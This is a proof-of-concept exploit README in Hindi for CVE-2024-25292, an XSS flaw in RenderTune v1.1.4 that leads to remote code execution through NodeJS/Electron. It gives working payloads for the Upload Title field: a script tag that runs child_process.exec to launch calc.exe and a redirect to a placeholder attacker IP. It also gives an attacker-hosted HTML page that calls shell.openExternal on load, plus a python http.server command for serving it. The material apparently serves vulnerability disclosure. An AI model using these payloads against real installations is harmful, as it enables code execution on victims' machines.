
RenderTune v1.1.4 में XSS से RCE एक्सप्लॉइट
CVE-2024-25292 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।
RenderTune v1.1.4 में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता हमलावरों को Upload Title पैरामीटर में इंजेक्ट किए गए विशेष रूप से तैयार किए गए पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
इस रिपॉजिटरी में एक उदाहरण भेद्य अनुप्रयोग और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण मौजूद है।
यह एक भेद्यता है जो XSS के माध्यम से RCE को सक्षम बनाती है। शीर्षक में XSS-सक्षम भाग होता है, इसलिए यह एक भेद्यता है जो XSS के सिंटैक्स के माध्यम से NodeJS के सिंटैक्स द्वारा RCE को सक्षम बनाती है।
चरण 1) पुष्टि करें कि शीर्षक भाग में XSS होता है ※ इस समय, जब तक छवि संलग्न नहीं की जाती, Upload आइटम पंजीकृत नहीं होगा
<b>jruru</b>

चरण 2) इसलिए, इसे NodeJS सिस्टम कमांड निष्पादित करने के लिए XSS का उपयोग करने के लिए कॉन्फ़िगर किया गया है।
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

※ जब आप window.location का उपयोग करके हमले का प्रयास करते हैं, तो ऐप चलाने पर आप हर बार स्वचालित रूप से उस पेज पर पहुंच जाते हैं जिसे आपने सेट किया है।
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>
नोट: ※ यदि आप इसे शीघ्रता से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के पीसी पर एक सर्वर बनाएं।
$ python -m http.server 80
<html>
<head>
<title>jruru Link</title>
</head>
<body>
<!-- Run scripts using on-click properties directly to the tag -->
<a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>
<script>
// Script function definition
function openExternal() {
try {
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
} catch(e) {
alert('JRURU');
alert(e);
}
}
// Run script automatically when loading pages
document.addEventListener('DOMContentLoaded', function() {
openExternal();
});
</script>
</body>
</html>
